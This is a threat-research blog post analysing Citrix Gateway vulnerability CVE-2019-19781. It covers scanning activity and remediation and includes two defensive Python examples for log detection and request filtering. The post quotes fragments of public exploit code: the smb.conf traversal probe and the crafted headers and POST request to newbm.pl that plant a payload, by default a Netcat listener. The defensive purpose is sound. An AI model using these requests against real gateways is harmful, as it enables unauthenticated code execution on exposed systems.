Blog Post

Citrix Gateway Vulnerability (CVE-2019-19781) Analysis

Executive Summary

On January 7th, SANS published a notification reporting an uptick in scanning activity for versions of Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) vulnerable to CVE-2019-19781. This vulnerability was disclosed by Citrix (CTX267027) on December 19th and, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

Between January 7th and January 11th, the Awake Threat Research team noticed an uptick in scanning activity trying to discover vulnerable Citrix servers across many environments. However, this was not followed by any exploitation, and the activity stopped after discovery. Since January 11th, multiple variants of exploit code have been published, and we believe we will see active exploitation of the devices identified as vulnerable by the scanning activity.

Technical Detail

Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) are vulnerable to a directory traversal attack that can be exploited by an attacker to access files and directories outside of the web root. This has been used to scan for and enumerate vulnerable servers, as seen in this recent example:

Figure 1: Awake detecting Citrix Directory Traversal attack from an IP address in China

To exploit this directory traversal vulnerability, the scanning activity we noticed used the following URI, clearly an attempt to reference a file outside the intended path using dot-dot-slash (../).

GET /vpn/../vpns/cfg/smb.conf HTTP/1.1

Figure 2: Directory path traversal seen in scanning activity

CVE-2019-19781 can be exploited by attackers to access configuration files or other critical files in other directories (e.g., smb.conf in the example above).
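As an added example (not part of the original post and not code from Awake or Citrix), the following Python script shows how the traversal pattern described above can be hunted for in web-server or reverse-proxy access logs. The log lines are constructed for illustration, and the combined-log-format regex, the double percent-decoding and the field names are assumptions of this example; the one thing it takes from the page is the dot-dot-slash path to smb.conf.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
# Two traversal reads of smb.conf (one percent-encoded), one POST to the
# newbm.pl script, one legitimate request, and one traversal that was refused.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jan/2020:10:12:01 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 1432 "-" "curl/7.64.1"
198.51.100.7 - - [08/Jan/2020:10:12:09 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Jan/2020:10:13:44 +0000] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 200 1432 "-" "python-requests/2.22.0"
192.0.2.9 - - [08/Jan/2020:10:15:02 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jan/2020:10:16:30 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 403 0 "-" "curl/7.64.1"
"""

# Assumed combined log format: ip ident user [ts] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(uri):
    """Drop the query string and percent-decode twice so that both
    %2e%2e and double-encoded %252e%252e collapse to '..' before matching."""
    path = uri.split("?", 1)[0]
    return unquote(unquote(path))


def is_traversal(path):
    """True when the decoded path contains a dot-dot-slash segment."""
    return "/../" in path or path.startswith("../") or path.endswith("/..")


def scan_access_log(text):
    """Return one finding per request whose decoded path contains traversal."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        path = normalize_path(m.group("uri"))
        if not is_traversal(path):
            continue
        findings.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "method": m.group("method"),
            "path": path,
            "status": int(m.group("status")),
            # A 403 means the mitigation (or a WAF) refused the request.
            "blocked": m.group("status") == "403",
        })
    return findings


def summarize_by_source(findings):
    """Count traversal attempts per source IP, split into served and blocked."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["ip"], {"served": 0, "blocked": 0})
        entry["blocked" if f["blocked"] else "served"] += 1
    return summary


if __name__ == "__main__":
    results = scan_access_log(SAMPLE_LOG)
    for f in results:
        state = "BLOCKED" if f["blocked"] else "SERVED "
        print(f"{state} {f['ip']:<14} {f['method']:<5} {f['path']}")
    print(summarize_by_source(results))
```

The decode-before-match step matters: a rule that looks for the literal string `/../` in the raw request line misses the `%2e%2e` variant in the third sample line, while the served-versus-blocked split lets a responder see at a glance whether a source reached the file before the mitigation was in place.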

Exploitability

Citrix Gateway is a customer-managed solution that is typically deployed on-premise or in the cloud to provide secure access and single sign-on to line-of-business applications. Citrix Gateways are therefore typically installed at the perimeter of the organization's network, directly accessible from the internet and wide open to this type of exploitation. Given the associated risk, CVE-2019-19781 has been assigned a CVSS score of 9.8 (Critical).

Searching Shodan, the Awake Threat Research team was able to discover approximately forty thousand internet-accessible Citrix gateways.

Figure 3: Shodan results for internet accessible Citrix servers.

Remote Code Execution

On January 11th, new GitHub projects were released to exploit this vulnerability to read sensitive files and, more importantly, then run arbitrary code on the vulnerable servers. The exploit code typically runs in a two-step process. First, it discovers vulnerable servers using the directory traversal:

req = requests.get("https://%s:%s/vpn/../vpns/cfg/smb.conf" % (target,targetport), verify=False, timeout=2)

Figure 4: HTTP request to scan for Vulnerable Citrix Gateways

If the responding Citrix server is found to be vulnerable, the directory traversal vulnerability is used to call an existing “newbm.pl” Perl script with specially crafted HTTP headers and POST data that write the attacker’s code to the file system, which can then be invoked to run arbitrary code on the vulnerable server. The GitHub code analyzed by the Awake Threat Research team drops a Netcat listener by default, but this payload can easily be changed to a web shell or anything else the attacker sees fit.

headers = ({
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
'NSC_NONCE' : '%s' % (nonce),
})
data = ({
"url" : "127.0.0.1",
"title" : payload,
"desc" : "desc",
"UI_inuse" : "a"
})

Figure 5: HTTP header and POST data built to drop an attacker’s payload

url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
req = requests.post(url, data=data, headers=headers, verify=False)

Figure 6: Existing Perl file on Citrix Gateways exploited to drop payload

Recommendation

As explained in the Technical Detail section, exploiting Citrix Gateways vulnerable to CVE-2019-19781 is trivial, and current scanning activity indicates that attackers are actively pursuing this.

While Citrix hasn’t released an official patch for this vulnerability, they have listed remediation steps in CTX267679 that can be taken immediately to protect against exploitation. These remediation steps will block all URL requests containing a directory traversal sequence (/../) and return an HTTP 403 Forbidden response. In addition, organizations should monitor access logs for directory traversal attempts. Any web application firewall capabilities available to the organization should be turned on to protect the vulnerable devices.
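The following Python function, added here as an illustration and not taken from Citrix’s CTX267679 or from the original post, models the behaviour of the recommended mitigation (refuse any request whose URL contains /../ with a 403) and additionally raises an alert for the NSC_USER header traversal used by the second exploitation stage shown in Figure 5. The request dictionary, the make_request helper, the action names and the percent-decoding before matching are assumptions of this example; a real responder policy or WAF rule must be written in the product’s own syntax.

```python
from urllib.parse import unquote


def make_request(method, uri, headers=None, body=None):
    """Build a minimal request record. Hypothetical helper: a proxy or WAF
    would hand the filter an object like this."""
    return {
        "method": method,
        "uri": uri,
        # Header names are case-insensitive; normalise for lookup.
        "headers": {k.upper(): v for k, v in (headers or {}).items()},
        "body": body or {},
    }


def decoded_path(uri):
    """Query string dropped, percent-decoded twice so that %2e%2e and
    %252e%252e both become '..' before the traversal check runs."""
    return unquote(unquote(uri.split("?", 1)[0]))


def has_traversal(value):
    """True when the value contains a dot-dot-slash segment."""
    return "/../" in value or value.startswith("../")


def evaluate(request):
    """Decide what a filtering layer should do with one request.

    block -> answer 403 Forbidden (the behaviour of the CTX267679 steps)
    alert -> let it through but raise an alert for investigation
    allow -> nothing suspicious in the fields this filter inspects
    """
    path = decoded_path(request["uri"])
    if has_traversal(path):
        reason = "directory traversal in URL"
        if path.endswith("/vpns/cfg/smb.conf"):
            reason = "CVE-2019-19781 reconnaissance read of smb.conf"
        elif path.endswith("/vpns/portal/scripts/newbm.pl"):
            reason = "CVE-2019-19781 payload write via newbm.pl"
        return {"action": "block", "status": 403, "reason": reason}

    # Second-stage indicator even when the URL itself is clean: the NSC_USER
    # header steering the bookmark write into another directory (Figure 5).
    nsc_user = unquote(request["headers"].get("NSC_USER", ""))
    if request["method"] == "POST" and has_traversal(nsc_user):
        return {"action": "alert", "status": 200,
                "reason": "NSC_USER header contains directory traversal"}

    return {"action": "allow", "status": 200, "reason": ""}


if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    samples = [
        make_request("GET", "/vpn/../vpns/cfg/smb.conf"),
        make_request("GET", "/vpn/%2e%2e/vpns/cfg/smb.conf"),
        make_request("POST", "/vpn/../vpns/portal/scripts/newbm.pl",
                     {"NSC_USER": "../../../netscaler/portal/templates/EXAMPLE.xml"}),
        make_request("POST", "/vpns/portal/scripts/newbm.pl",
                     {"NSC_USER": "../../../netscaler/portal/templates/EXAMPLE.xml"}),
        make_request("GET", "/vpn/index.html"),
    ]
    for r in samples:
        verdict = evaluate(r)
        print(f"{verdict['action']:<5} {verdict['status']} {r['method']:<4} "
              f"{r['uri']}  {verdict['reason']}")
```

Matching after decoding is what makes the 403 rule hold up: a filter that compares the raw URL against the literal `/../` lets the `%2e%2e` form through. The separate NSC_USER alert covers the case where the script path is reached without traversal in the URL, so that log reviewers still see the second-stage attempt rather than a plain 200.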

Param Singh

VP, Threat Research